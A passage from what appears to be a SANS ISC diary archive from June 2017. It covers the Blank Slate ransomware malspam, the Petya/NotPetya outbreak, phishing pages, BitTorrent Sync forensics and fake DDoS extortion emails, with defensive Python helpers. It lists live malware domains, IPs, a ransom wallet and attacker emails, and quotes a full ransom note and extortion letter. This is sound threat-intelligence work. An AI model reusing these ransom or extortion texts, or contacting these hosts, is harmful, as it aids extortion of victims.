Diaries

Published: 2017-06-28

Catching up with Blank Slate: a malspam campaign still going strong

Introduction

"Blank Slate" is the nickname for a malicious spam (malspam) campaign pushing ransomware targeting Windows hosts.  I've already discussed this campaign in a previous diary back in March 2017.  It has consistently sent out malspam since then.  Today I collected 11 Blank Slate emails, so this diary examines recent developments from the Blank Slate campaign.

Today's Blank Slate malspam was pushing Cerber and GlobeImposter ransomware.


Shown above:  Screenshot of spreadsheet tracking for the 11 emails (image 1 of 3).


Shown above:  Screenshot of spreadsheet tracking for the 11 emails (image 2 of 3).


Shown above:  Screenshot of spreadsheet tracking for the 11 emails (image 3 of 3).

The malspam

Normally, emails from this campaign are blank messages with vague subject lines and attachments whose names don't indicate what they contain.  That's why I've been calling it the "Blank Slate" campaign.


Shown above:  Example of a typical Blank Slate email from today, Wednesday 2017-06-28.

However, since yesterday, the Blank Slate campaign has sent several Microsoft-themed messages.  We've seen this before.  As recently as 2017-04-13, I documented Blank Slate malspam using fake Microsoft messages that led to fake Chrome installation pages.  Those fake Chrome pages sent victims zip archives containing malicious .js files designed to infect Windows hosts with ransomware.


Shown above:  Microsoft-themed Blank Slate email from April 2017.

Today's messages look similar to previous Microsoft-themed emails; however, this time they don't have links to a fake Chrome page.  Instead, they have zip attachments containing malicious .js files.


Shown above:  Microsoft-themed Blank Slate email from today, Wednesday 2017-06-28.

Otherwise, these emails are similar to previous waves of Blank Slate malspam.

The attachments

As usual, the zip attachments are double-zipped, and they contain a .js file designed to infect a Windows computer with ransomware.  I saw two types of .js files.  One was about 9 kB in size, and it ran the downloaded ransomware from the user's AppData\Local\Temp directory.  The other type of .js file was about 31 kB in size, and it ran the downloaded ransomware from the user's AppData\Roaming\Microsoft\Windows\Templates directory.


Shown above:  Example of a 9 kB .js file from this wave of malspam.
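Unpacking these double-zipped attachments for triage is easy to script.  Below is a minimal Python sketch (standard library only, and the function name is my own, not part of the campaign's tooling) that recursively descends into any inner archive and returns SHA256 hashes for the .js files it finds:

```python
import hashlib
import io
import zipfile

def extract_nested_js(zip_bytes):
    """Walk a (possibly double-zipped) attachment and return
    {filename: sha256} for any .js files found inside."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as outer:
        for name in outer.namelist():
            data = outer.read(name)
            if name.lower().endswith('.zip'):
                # Recurse into the inner archive.
                results.update(extract_nested_js(data))
            elif name.lower().endswith('.js'):
                results[name] = hashlib.sha256(data).hexdigest()
    return results
```

As always, only handle live samples like these inside an isolated analysis environment.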

The traffic

Traffic is also typical of what we've seen before with Blank Slate malspam.  Ransomware binaries are typically downloaded in the clear from a domain name ending with .top.


Shown above:  Ransomware binary downloaded by one of the .js files.

No post-infection traffic was noted for today's GlobeImposter ransomware.  I saw the typical post-infection traffic for today's Cerber samples.


Shown above:  Traffic generated by a Cerber sample from today's malspam, filtered in Wireshark.

Post infection

As others have noted on Twitter and elsewhere, recent Cerber samples use "CRBR" as their name in the decryption instructions.  The file extension Cerber appends to encrypted files consists of 4 characters derived from the MachineGuid of the infected Windows host.


Shown above:  Desktop of a Windows host infected with one of today's Cerber samples.


Shown above:  Based on that host's MachineGuid, all my encrypted files ended with .BRAD.

GlobeImposter also acts the same as we've seen before.  Encrypted files use the .crypt file extension.


Shown above:  Desktop from a Windows host infected with today's GlobeImposter sample.

Indicators of Compromise (IOCs)

The following are SHA256 hashes for today's extracted .js files:

  • 10358fb055b8d8e0d486eafc66be180d52481667fb63bf4e37bf9cafe5a0dbdb - 7941.js
  • 153b11ae2df30b671bd0bd54af55f83fd2a69e47c8bb924b842bc1b44be65859 - 25601.js
  • 1cbf043831b16ca83eeaff24f70b1a3ea4973d2609e64db33fd82cc0629f1976 - 6935.js
  • 567bb9c835306e02dbedc5f10e32c77a2c6f1c2f28ff49c753f963776a9378b5 - 30085.js
  • 7ecd1253aad0935df1249d6504d3f4090a00466fa159c2ec4e2d141b4b75068f - 9177.js
  • 8b7202a672290e651f9d3c175daaf2b8a3635eba193e925da41bd880a611f2af - 13521.js
  • 8ec6455eb9f8a72fef35e9a330e59153f76b8ebd848c340024669e52589ceb18 - 23288.js
  • b6ab00337d1e40f894ca3959ee9a19e4c9e59605ed1f2563f0bde4df5f76981b - 27465.js
  • c9f71912dd39d4d4ed9f54f6a51f99ee0687e084c2e8782f0b0d729b743e7281 - 3047.js
  • d19233fd99213f5a1d299662d9693eb6bc108d72ce676893bc69c8d309caa54a - 26715.js
  • ed855d0b4cfd5150a4b44a1d3b6c26224e2990743d977804bab926d569aa963b - 24703.js

The following are SHA256 hashes for ransomware samples downloaded by the extracted .js files:

  • 0dc831b502f29d4a6a68da9e511feb8c646af4fcfdeaaee301cb5b0dbaf47c5f - Cerber
  • 703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f - GlobeImposter
  • b1be5af4169014508b17d2de5aa581ea62988cc4d3570ed2ed7f9fb931a5902b - Cerber
  • d1ed3742380539fbef51804e1335c87dd0ef24a6de7f0aa09ce26ad1efe4bcef - Cerber
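If you need to check quarantined files against these IOCs, a chunked SHA256 comparison avoids loading large binaries into memory.  This is a generic sketch of my own; KNOWN_BAD holds just two of the hashes listed above, and you would extend it with the full list:

```python
import hashlib

# Two of the SHA256 hashes from the IOC list above; extend as needed.
KNOWN_BAD = {
    '0dc831b502f29d4a6a68da9e511feb8c646af4fcfdeaaee301cb5b0dbaf47c5f': 'Cerber',
    '703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f': 'GlobeImposter',
}

def check_file(path):
    """Hash a file in 64 kB chunks and return the family name on a match."""
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return KNOWN_BAD.get(h.hexdigest())
```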

The following are domains, HTTP requests, and IP addresses associated with today's Blank Slate malspam:

  • 103.52.216.15 port 80 - coolfamerl.top - GET /1  [returned Cerber]
  • 103.52.216.15 port 80 - clippodoops.top - GET /403  [returned GlobeImposter]
  • 103.52.216.15 port 80 - clippodoops.top - GET /1  [returned Cerber]
  • 77.12.57.0 thru 77.12.57.31 (77.12.57.0/27) UDP port 6893  [Cerber post-infection scan]
  • 19.48.17.0 thru 19.48.17.31 (19.48.17.0/27) UDP port 6893  [Cerber post-infection scan]
  • 87.98.176.0 thru 87.98.179.255 (87.98.176.0/22) UDP port 6893  [Cerber post-infection scan]
  • 216.170.123.2 port 80 - xpcx6erilkjced3j.1t2jhk.top - Domain leading to the Cerber decryptor
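The Cerber scan ranges above are easy to match programmatically with Python's ipaddress module.  A hypothetical helper for flagging matching flows in your own traffic logs might look like this:

```python
import ipaddress

# Cerber post-infection scan ranges from the IOCs above.
CERBER_RANGES = [
    ipaddress.ip_network('77.12.57.0/27'),
    ipaddress.ip_network('19.48.17.0/27'),
    ipaddress.ip_network('87.98.176.0/22'),
]

def is_cerber_scan(dst_ip, dst_port, proto='udp'):
    """Flag UDP traffic to port 6893 aimed at the known scan ranges."""
    if proto != 'udp' or dst_port != 6893:
        return False
    addr = ipaddress.ip_address(dst_ip)
    return any(addr in net for net in CERBER_RANGES)
```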

Email from the GlobeImposter decryption instructions:  chines34@protonmail.ch

Final words

As I noted last time, potential victims must open the zip attachment, open the enclosed zip archive, then double-click the final .js file.  That works on default Windows configurations, but properly-administered Windows hosts and decent email filtering are enough, I think, to keep most people from worrying about Blank Slate.

This is definitely not as serious as the recent Petya/NotPetya ransomware outbreak on 2017-06-27.  I still wonder how many people are fooled by Blank Slate malspam.  Does anyone know someone who was actually infected from these emails?  If so, please share your story in the comments section below.

Pcap and malware samples for this ISC diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net


Published: 2017-06-28

Petya? I hardly know ya! - an ISC update on the 2017-06-27 ransomware outbreak

This is a follow-up to our previous diary on the ransomware outbreak that happened yesterday, Tuesday 2017-06-27.

Introduction

By now, it seems almost everyone has written something about yesterday's ransomware outbreak.  This led to some confusion after more information became available, and initial reports were updated.  This diary acts as a summary of what we know so far.


Shown above:  Screen shot from a host infected with this ransomware.

What we know so far

This ransomware targets systems running Microsoft Windows.  Although initial reporting called this ransomware Petya or a Petya variant, Kaspersky researchers reported it's a new ransomware.  Kaspersky has been calling the malware NotPetya, and other names have been floating around for it.  However, many people and organizations still call the ransomware Petya or a Petya variant.

This ransomware uses a modified version of the EternalBlue SMB exploit, and it also spreads using other methods like WMI commands, Mimikatz, and PsExec.  Although exploits for EternalBlue are relatively recent, malware has been using file shares and WMI to spread for years, and these older techniques don't require any vulnerabilities.

During the infection process, this ransomware overwrites the MBR with a custom boot loader that implements a tiny malicious kernel.  That tiny kernel encrypts the master file table (MFT) so the file system is unreadable.  The result is an unbootable system that demands a ransom to restore it.  The victim is asked to send $300 USD in Bitcoin to a Bitcoin wallet at 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX.


Shown above:  Nearly 4 Bitcoin received for that Bitcoin wallet as of 2017-06-28 at 16:44 UTC.

Based on public reports, this attack appears to have originated in Ukraine.  According to Krebs on Security, the Ukrainian Cyber Police tweeted that this attack may have started through a software update mechanism built into M.E.Doc, an accounting program used by companies working with the Ukrainian government.  From Ukraine, it spread to major European firms like Maersk.

Although we've seen some information on files related to this ransomware, we can only confirm two DLL files as samples of the actual ransomware.  The SHA256 file hashes are:

How can you protect yourself against this threat?  Steps include:

  • Deploy the latest Microsoft patches, especially MS17-010.
  • Consider disabling SMBv1.
  • Restrict who has local administrative access.  Most people can operate with Standard User accounts instead of Administrator accounts.
  • If you have a large or complex infrastructure, segment your network.
  • Keep your anti-virus software up-to-date.  Vendors are constantly updating definitions to cover the latest malware samples.

Most importantly, you should implement a solid backup and recovery procedure for your critical data, just in case the worst happens and you get infected.

Final words

The day after this ransomware attack, our initial excitement has died down a bit.  Affected organizations are conducting response actions, and many others are implementing (or confirming) proper countermeasures.

We hope your organization is following best security practices and is protected against this latest threat.

---
Brad Duncan
brad [at] malware-traffic-analysis.net


Published: 2017-06-27

Checking out the new Petya variant

This is a follow-up from our previous diary about today's ransomware attacks using the new Petya variant.  So far, we've noted:

  • Several hundred more tweets about today's attack can be found on Twitter using #petya.
  • The new Petya variant appears to be using the MS17-010 Eternal Blue exploit to propagate.
  • Others claim the new variant uses WMIC to propagate.
  • Still no official word on the initial infection vector in today's attacks.
  • People everywhere are saying today's activity is similar to last month's WannaCry ransomware attacks.

Samples of the new Petya variant are DLL files.  So far, we've confirmed the following two SHA256 file hashes are the new variant:

Examining the new Petya variant

Petya is a ransomware family that works by modifying the infected Windows system's Master Boot Record (MBR).  Using rundll32.exe with #1 as the DLL entry point, I was able to infect hosts in my lab with the above two DLL samples.  The reboot didn't occur right away.  However, when it did, my infected host did a CHKDSK after rebooting. 


Shown above:  An infected host immediately after rebooting.

After CHKDSK finished, the infected Windows host's modified MBR prevented Windows from loading.  Instead, the infected host displayed a ransom message.


Shown above:  The ransom note from a compromised system.

Samples of the new Petya variant appear to have WMI command-line (WMIC) functionality.  Others have confirmed this variant spreads over Windows SMB and is reportedly using the EternalBlue exploit tool, which exploits CVE-2017-0144 and was originally released by the Shadow Brokers group in April 2017.  My infected Windows hosts immediately generated TCP traffic on port 445 and did ARP requests for local network hosts.


Shown above:  Some of the traffic noted in my lab environment.

Keep in mind this is a new variant of Petya ransomware.  I'm still seeing samples of the regular Petya ransomware submitted to places like VirusTotal and other locations.  From what we can tell, those previous versions of Petya are not related to today's attacks.


Shown above:  Difference in ransomware notes between the old and new Petya variants.

New Petya variant ransom message

Ooops, your important files are encrypted.

If you see this text, then your files are no longer accessible, because they have been encrypted.  Perhaps you are busy looking for a way to recover your files, but don't waste your time.  Nobody can recover your files without our decryption service.

We guarantee that you can recover all your files safely and easily.  All you need to do is submit the payment and purchase the decryption key.

Please follow the instructions:

1. Send $300 worth of Bitcoin to the following address:

   1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

2. Send your Bitcoin wallet ID and personal installation key to e-mail wowsmith123456@posteo.net. Your personal installation key:

012345-6789ab-cdefgh-ijklmn-opqrst-uvwxyz-ABCDEF-GHIJKL-MNOPQR-STUVWX

If you already purchased your key, please enter it below.
Key:

More reports about the new Petya variant


Published: 2017-06-27

Wide-scale Petya variant ransomware attack noted

Sent from a reader earlier today:

  • Hearing some rumors that the company Merck is having a major virus outbreak with something new and their Europe networks are affected more than their US offices.  Have you heard anything on this?

A quick check reveals that, apparently, another global ransomware attack is making the rounds today.

Initial reports indicate this is much like last month's WannaCry attack.  According to a report from The Verge, today's ransomware appears to be a new Petya variant called Petyawrap.  At this point, we see plenty of speculation on how the ransomware is spreading (everything from email to an EternalBlue-style SMB exploit), but nothing has been confirmed yet for the initial infection vector.

Alleged samples of this ransomware include the following SHA256 hashes:

AlienVault Open Threat Exchange (OTX) is currently tracking this threat at:

We'll provide more information as it becomes available.


Published: 2017-06-27

A Tale of Two Phishies

Introduction

Has anyone read A Tale of Two Cities, the 1859 novel by Charles Dickens?  Or maybe seen one of the movie adaptations of it?  It's set during the French Revolution, including the Reign of Terror, where revolutionary leaders used violence as an instrument of the government.

In the previous sentence, substitute "violence" with "email."  Then substitute "government" with "criminals."  Now what do you have?  Email being used as an instrument of the criminals!

I know, I know...  No real ties to Dickens' novel here.  A pun for the title is, quite literarily, the best I could do.


Shown above:  That's all I got--a somewhat clever title for this diary.

This diary briefly investigates two phishing emails.  It's a "Tale of Two Phishies" I ran across on Monday 2017-06-26.

First example: an unsophisticated phish

The first example went to my blog's admin email address.  It came from the mail server of an educational institution in Paraguay, possibly used as a relay from an IP address in South Africa.  When reviewing email headers, you can only rely on the "Received:" header added when the message hits your own mail server.  Anything before that can be spoofed.
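To illustrate that point: "Received:" headers are prepended as a message travels, so only the topmost one (added by your own mail server) is trustworthy.  A quick sketch using Python's standard email library; the function name is mine, and any message contents you feed it would come from your own mailbox:

```python
from email import message_from_string

def trusted_hop(raw_message):
    """Return the first (topmost) Received header -- the only hop
    added by your own mail server; everything below it can be spoofed."""
    msg = message_from_string(raw_message)
    received = msg.get_all('Received') or []
    return received[0] if received else None
```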

It's a pretty poor attempt, because this phishing message is very generic.  I'm educated enough to realize this didn't come from my email provider.  And the login page was obviously fake.  Unfortunately, some people might actually be fooled by this.

The compromised website hosting the fake login page was quickly taken offline, so you won't be able to replicate the traffic by the time you read this.  It's already been submitted to PhishTank.


Shown above:  The first phishing email.


Shown above:  Email headers from the first phishing email.


Shown above:  The fake login page from link in the phishing email.

Second example: a slightly more complex phish

Every time I see a phishing message like this second example, I hope there's malware involved.  But in this case, the email has a PDF attachment with a link to a fake Adobe login page.


Shown above:  The second phishing email.

Examining the PDF attachment, I quickly realized the criminals had made a mistake.  They forgot to put .com at the end of the domain name in the URL from the PDF file.  lillyforklifts should be lillyforklifts.com.  I'd checked the URL early Monday morning with .com at the end of the domain name, and it worked.  When I later checked again for this diary, it had already been taken down.


Shown above:  PDF attachment from the second phishing email.

An elephant in the room

These types of phishes are what I call an "elephant in the room."  That's an English-language metaphor.  "Elephant in the room" represents an obvious issue that no one discusses or challenges.  These types of phishing emails are very much an elephant in the room for a lot of security professionals.  Why?  Because we see far more serious issues during day-to-day operations in our networks.  Many people (including me) feel we have better things to worry about.

But these types of phishing emails are constantly sent.  They represent an on-going threat, however small they might be in comparison to other issues.

Messages with fake login pages for Netflix, Apple, email accounts, banks, and other organizations occur on a daily basis.  For example, on Phishtank.com, the stats page indicates an average of 1,000 to 1,500 unique URLs were submitted on a daily basis during the past month.  Stats for specific months show 58,556 unique URLs submitted in May 2017 alone.

Fortunately, various individuals on Twitter occasionally tweet about the fake login pages they find.  Of course, many people also notify sites like PhishTank, scumware.org, and many other resources to fight this never-ending battle.

So today, it's open discussion on these phishing emails.  Do you know anyone that's been fooled by these messages?  Are there any good resources covering these phishing emails I forgot to mention?  If so, please share your stories or information in the comments section below.

---
Brad Duncan
brad [at] malware-traffic-analysis.net


Published: 2017-06-26

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud (Part 1)

[This is the first part of a multi-part guest diary written by Dr. Ali Dehghantanha]

One of the nightmares of any forensic investigator is coming across a new or undocumented platform or application during an investigation with tight deadlines.  The investigator has only limited research time to find evidence and hopes not to miss any essential remnants.  Fortunately, there is a field of research called "residual data forensics," in which researchers detect and document remnants (evidence) of forensic value left by user activities on different platforms.  Residual forensics researchers usually list the minimum evidence a forensic practitioner can expect to extract.

In one of my recent engagements, I had to investigate BitTorrent Sync version 2.0 on a range of different devices. Back then I used papers authored by Scanlon, Farina et al. (see References 1-4) on the investigation of BitTorrent Sync (version 1.1.82). However, a redesigned folder sharing workflow was introduced in newer versions of BitTorrent Sync (from version 1.4 onwards), so there is a need to develop an up-to-date understanding of the artefacts left by the newer BitTorrent Sync applications.

In a series of diaries I am going to discuss the residual artefacts of BitTorrent Sync version 2.0 on Windows 8.1, Mac OS X Mavericks 10.9.5, Ubuntu 14.04.1 LTS, an iPhone 4 running iOS 7.1.2, and an HTC One X running Android KitKat 4.4.4. (For a more involved read, including the experiment setup and full details of our investigation, please refer to our paper titled "Forensic Investigation of P2P Cloud Storage: BitTorrent Sync as a Case Study" (Reference 5).) Please feel free to comment on any other evidence you have come across in your investigations and/or suggest other investigative approaches.

This diary post explains artefacts of directory listings and files of forensic interest of BitTorrent Sync version 2.0 on Windows 8.1, Mac OS X Mavericks 10.9.5, and Ubuntu 14.04.1 LTS.

The downloaded folders were saved at %Users%\[User Profile]\BitTorrent Sync, /home/[User profile]/BitTorrent Sync, and /Users/[User Profile]/BitTorrent Sync on the Windows 8.1, Ubuntu OS, and Mac OS clients by default, respectively. Within the shared folders (both locally added and downloaded) there is a hidden ‘.sync’ subfolder. The file of particular interest stored within the subfolder is the ‘ID’ file which holds the folder-specific share ID in hex format. The share ID would be especially useful when seeking to identify peers sharing the same folder during network analysis.
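Reading that share ID out of a synced folder takes only a couple of lines.  This sketch assumes the default folder layout described above and that the ID file holds raw bytes which we render as hex; if your copy already stores hex text, read it directly instead:

```python
from pathlib import Path

def read_share_id(sync_folder):
    """Return the share ID from the hidden .sync/ID file as a hex string.

    Assumes the ID file holds raw bytes; if it is already hex-encoded
    text on your system, just read the file contents directly.
    """
    id_file = Path(sync_folder) / '.sync' / 'ID'
    return id_file.read_bytes().hex().upper()
```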

When a synced file was deleted, copies of the deleted file could be recovered from the /.sync/Archive folder of the corresponding peer devices. It is important to note that deleted files are only kept in the archive folder for 30 days by default. Copies of the deleted files, alongside the pertinent file deletion information (e.g., the original paths, file sizes, and deletion times), can be recovered from the %$Recycle.Bin%\SID folder on Windows 8.1, but the files are renamed to a set of random characters prefixed with $R and $I. On the Ubuntu machine, copies of deleted files can be recovered from the /home/[User Profile]/.local/share/Trash/files folder. The original file path and deletion time can be recovered from .TRASHINFO files located in /home/[User Profile]/.local/share/Trash/info/. In contrast to Windows and Ubuntu, examination of the Mac OS X trash folder (located at /Users/[User profile]/.Trash) only recovered copies of the deleted files. However, it is noteworthy that these findings only apply to the system that initiated the file deletion, and only as long as the recycle bin or trash folder has not been emptied. A practitioner could potentially recover BitTorrent Sync usage information from various metadata files residing in the application folder located at %AppData%\Roaming\BitTorrent Sync on Windows 8.1 and /Users/[User Profile]/Library/Application Support/BitTorrent Sync on Mac OS X.
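The $I metadata records mentioned above follow a simple binary layout on Windows Vista through 8.1: an 8-byte header, a 64-bit file size, a 64-bit FILETIME deletion timestamp, then a fixed 520-byte UTF-16 path field (Windows 10 later changed to a variable-length path).  A parsing sketch under that assumption:

```python
import struct
from datetime import datetime, timedelta

def parse_dollar_i(data):
    """Parse a $I metadata file from $Recycle.Bin (Windows Vista-8.1
    layout: 8-byte header, file size, FILETIME, fixed 520-byte path)."""
    header, size, filetime = struct.unpack_from('<QQQ', data, 0)
    # FILETIME counts 100-ns intervals since 1601-01-01 UTC.
    deleted = datetime(1601, 1, 1) + timedelta(microseconds=filetime // 10)
    path = data[24:24 + 520].decode('utf-16-le').split('\x00', 1)[0]
    return {'size': size, 'deleted': deleted, 'path': path}
```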

The application folder maintains a similar directory structure across multiple operating systems, and the /%BitTorrent Sync%/.SyncUser<Random number> subfolder is an identity-specific application folder that will be synchronised across multiple devices sharing the same identity. The first file of particular interest within the application folder is settings.dat which maintains a list of metadata associated with the device under investigation such as the installation path (which could be distinguished by the ‘exe_path’ entry), installation time in Unix epoch format (‘install_time’), non-encoded peer ID (‘peer_id’), log size (‘log_size’), registered URLs for peer search (‘search_list’, ‘tracker_last’ etc.), and other information of relevance. The second file of forensic interest within the application folder is the sync.dat which contains a wealth of information relating to the shared folders downloaded to the device under investigation. In particular, the device name could be discerned from the ‘device’ entry. The ‘identity’ entry records the identity name (‘name’) of the device under investigation as well as the private (‘private_keys’) and public keys (‘public_keys’) used to establish connections with other devices. A similar finding was observed for the peer identities in ‘identities’ entry. A replication of the ‘identity’ and ‘identities’ entries can be located in the local-identity-specific /%BitTorrent Sync%/.SyncUser<Random number>/identity.dat file and peer-identity-specific /%BitTorrent Sync%/.SyncUser<Random number>/identities/[Certificate fingerprint] file (with the exception of the private key) respectively. 
The ‘access-requests’ entry holds a list of metadata pertaining to the identities that sent folder access requests to the device under investigation, such as the last used IP addresses in network byte order (‘addr’), identity names (‘name’), and public keys (‘public_keys’) of the requesting identities, as well as base32-encoded temporary keys (‘invite’), requested folder IDs, requested times (‘req_time’), requested permissions (‘requested_permissions’, where 2 indicates read only, 3 indicates read and write, and 4 indicates owner), and granted permissions (‘granted_permissions’).

Located within the ‘folders’ entry of the sync.dat file is metadata relating to the synced folders. It should be noted that this entry will never be empty, as it will always contain at least an entry for the identity-specific /%BitTorrent Sync%/SyncUser<Random number> application folder. Amongst the information of forensic interest recoverable from the ‘folders’ entry are the folder IDs (‘folder_id’), storage paths (‘path’), the addition and last modified dates in Unix epoch format, the peer discovery method(s) used to share the synced folders, the access and root certificate keys, whether the folders have been moved to trash, and other information of relevance. Correlating the folder IDs recovered from the ‘folders’ entry with the folder IDs located in /%BitTorrent Sync%/SyncUser<Random number>/devices/[Base32-encoded Peer ID]\folders\ may determine the shared folders associated with a peer device. Analysis of the access control list (‘acl’) subentry (of the ‘folders’ entry) can be used to identify the permissions of identities associated with each shared folder, such as the identity names (‘name’), public keys (‘public_keys’), signature issuers, the times when the identities were linked to a specific shared folder, as well as other information of relevance. Similar details can be located in the folder-specific /%BitTorrent Sync%/.SyncUser<Random number>/folders/[Folder ID]/info.dat file. The ‘peers’ subentry (of the ‘folders’ entry), if available, would provide a practitioner with information about the peers associated with the shared folders added by the device under investigation, such as the last completed sync time (‘last_sync_completed’), last used IP address (‘last_addr’) in network byte order, device name (‘name’), last seen time (‘last_seen’), last data sent time (‘last_data_sent’), and other relevant information.

Another file of interest which can potentially allow a practitioner to recover sync metadata is the /%BitTorrent Sync%/[share-ID].db SQLite3 database. This share-ID-specific database describes the content of a shared folder (including the /%BitTorrent Sync%/SyncUser<Random number> application folder), such as the shared filenames or folders (stored in the ‘path’ field of the ‘files’ table), hashes, and transfer piece registers for the shared files or folders. Once the shared filenames or folders have been identified, a practitioner may map the details to the /%BitTorrent Sync%/history.dat file (which maintains a list of the file syncing events that appear in the History view of the BitTorrent Sync client application) to obtain the sync times in Unix epoch format as well as the associated device names, as shown in Figure 1.

Figure 1: History.dat file
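Pulling the shared file and folder names out of a [share-ID].db file is a one-line SQLite query.  The ‘files’ table and ‘path’ column below are as described above, but verify them against your own copy, since the schema is not officially documented:

```python
import sqlite3

def list_synced_paths(db_file):
    """List shared file/folder names from a [share-ID].db database.

    Assumes the 'files' table and 'path' column described in the text;
    confirm against your own evidence copy before relying on this.
    """
    con = sqlite3.connect(db_file)
    try:
        return [row[0] for row in con.execute('SELECT path FROM files')]
    finally:
        con.close()
```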

The /%BitTorrent Sync%/sync.pid file holds the last used process identifier (PID), which can be used to correlate data with physical memory remnants (e.g., mapping a string of relevance to the data residing in the memory space of the investigated PID using the ‘yarascan’ function of Volatility). It is important to note that all the metadata files mentioned above are bencoded (with the exception of the sync.pid file), and old metadata files carry an .OLD extension. Moreover, the sync.dat, settings.dat, and history.dat files are protected with a salted file guard key to ensure that only the BitTorrent Sync application may edit them.
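Since these metadata files are bencoded, a small decoder is enough to inspect them once any file guard header has been accounted for.  This minimal sketch of my own handles the four bencode types (integers, byte strings, lists, dictionaries) and returns the decoded value plus the next offset; epoch values such as ‘install_time’ can then be converted with datetime.utcfromtimestamp():

```python
def bdecode(data, pos=0):
    """Minimal bencode decoder; returns (value, next_position)."""
    c = data[pos:pos + 1]
    if c == b'i':                                  # integer: i<digits>e
        end = data.index(b'e', pos)
        return int(data[pos + 1:end]), end + 1
    if c == b'l':                                  # list: l<items>e
        items, pos = [], pos + 1
        while data[pos:pos + 1] != b'e':
            item, pos = bdecode(data, pos)
            items.append(item)
        return items, pos + 1
    if c == b'd':                                  # dict: d<key><value>...e
        d, pos = {}, pos + 1
        while data[pos:pos + 1] != b'e':
            key, pos = bdecode(data, pos)
            val, pos = bdecode(data, pos)
            d[key] = val
        return d, pos + 1
    colon = data.index(b':', pos)                  # string: <length>:<bytes>
    length = int(data[pos:colon])
    return data[colon + 1:colon + 1 + length], colon + 1 + length
```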

When BitTorrent Sync was accessed on a Mac OS device, additional references to the client application usage can be located in the preference files under /Users/[User profile]/Library/Preferences/. For instance, the com.apple.spotlight.plist file holds the app path and the last used time in plain text (see Figure 2). The com.bittorrent.Sync.plist file contains supporting information for timeline analysis, such as the app version, last software update check time, and last started time in Unix epoch format.

Figure 2: com.apple.spotlight.plist

When a shared folder was disconnected, it was observed that no changes were made to the peer devices, even when the option ‘delete files from this device’ was selected to permanently delete the synced files/folders from the local device. When an identity was unlinked from the investigated devices, the identity-specific /%BitTorrent Sync%/.SyncUser<Random number> application folder was deleted from the local device. However, only the identity-specific metadata was removed from the ‘identity’ and ‘identities’ entries of the local and peer devices' settings.dat files.

Undertaking uninstallation of the Windows client application would remove synced folders from folders containing the ‘.sync’ subfolder in the directory listing. Manual uninstallation of the Linux and Mac client applications left no trace of the client application usage/installation in the directory listing, but (obviously) deleted files/folders were recoverable from the non-emptied /Users/[User profile]/.Trash folder of the Mac OSX VM investigated.

Undertaking data carving of unallocated spaces (of the file synchronisation VMs) could recover copies of synced files as well as the log and metadata files of forensic interest (e.g., sync.log, sync.dat, history.dat, and settings.dat used by the client applications). A search for the terms ‘bittorrent’, bencode keys specific to the metadata files of relevance, as well as the pertinent log entries was able to locate copies of the recovered files. The remnants remained even after uninstallation of client applications, which suggested that unallocated space is an important source for recovering deleted BitTorrent Sync or synced files.

Our next post will describe the investigation of BitTorrent Sync log files.

References

1) Scanlon, M., Farina, J. and Kechadi, M. T. (2014a) BitTorrent Sync: Network Investigation Methodology, In IEEE, pp. 21–29, [online] Available from: http://ieeexplore.ieee.org/lpdocs/epic03/wrapper.htm?arnumber=6980260 (Accessed 11 March 2015).

2) Scanlon, M., Farina, J., Khac, N. A. L. and Kechadi, T. (2014b) Leveraging Decentralization to Extend the Digital Evidence Acquisition Window: Case Study on BitTorrent Sync, arXiv:1409.8486 [cs], [online] Available from: http://arxiv.org/abs/1409.8486 (Accessed 18 March 2015).

3) Scanlon, M., Farina, J. and Kechadi, M.-T. (2015) Network investigation methodology for BitTorrent Sync: A Peer-to-Peer based file synchronisation service, Computers & Security, [online] Available from: http://www.sciencedirect.com/science/article/pii/S016740481500067X (Accessed 9 July 2015).

4) Farina, J., Scanlon, M. and Kechadi, M. T. (2014) BitTorrent Sync: First Impressions and Digital Forensic Implications, Digital Investigation, Proceedings of the First Annual DFRWS Europe, 11, Supplement 1, pp. S77–S86.

5) Teing Yee Yang, Ali Dehghantanha, Kim-Kwang Raymond Choo, "Forensic Investigation of P2P Cloud Storage: BitTorrent Sync as a Case Study", (Elsevier) International Journal of Computers & Electrical Engineering, 2016.

Find out more about Dr. Ali Dehghantanha at http://www.alid.info


Published: 2017-06-23

Fake DDoS Extortions Continue. Please Forward Us Any Threats You Have Received.

We continue to receive reports about DDoS extortion e-mails. These e-mails are essentially spammed to the owners of domains based on whois records. They claim to originate from well-known hacker groups like "Anonymous" that have been known to launch DDoS attacks in the past, using the notoriety of the group's name to make the threat sound more plausible. But there is no evidence that these threats originate from those groups, and so far we have not seen a single case of a DDoS attack launched after a victim received one of these e-mails. So no reason to pay :)

Here is an example of such an e-mail (I anonymized some of the details, like the bitcoin address and the domain name):

We are Anonymous hackers group.
Your site [domain name] will be DDoS-ed starting in 24 hours if you don't pay only 0.05 Bitcoins @ [bit coin address]
Users will not be able to access sites host with you at all.
If you don't pay in next 24 hours, attack will start, your service going down permanently. Price to stop will increase to 1 BTC and will go up 1 BTC for every day of attack.
If you report this to media and try to get some free publicity by using our name, instead of paying, attack will start permanently and will last for a long time.
This is not a joke.
Our attacks are extremely powerful - over 1 Tbps per second. No cheap protection will help.
Prevent it all with just 0.05 BTC @ [bitcoin address]
Do not reply, we will not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
Bitcoin is anonymous, nobody will ever know you cooperated.

This particular e-mail was rather cheap. Other e-mails asked for up to 10 BTC. 

There is absolutely no reason to pay any of these ransoms. But if you receive an e-mail like this, there are a couple of things you can do:

  • Verify your DDoS plan: Do you have an agreement with an anti-DDoS provider? A contact at your ISP? Try to make sure everything is set up and working right.
  • We have seen these threats being issued against domains that are not in use. It may be best to remove DNS for the domain if this is the case, so your network will not be affected. 
  • Attackers often run short tests before launching a DDoS attack. Can you see any evidence of that, such as a brief, unexplained traffic spike? If so, take a closer look: detecting an actual test makes the threat more serious. The purpose of the test is often to assess the firepower needed to DDoS your network.
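That last check can be automated against whatever per-interval traffic counters you already collect. A minimal sketch (the function name and the 10x threshold are made up for illustration, not tuned values):

```python
# Flag short, unexplained traffic spikes (a possible DDoS "test shot")
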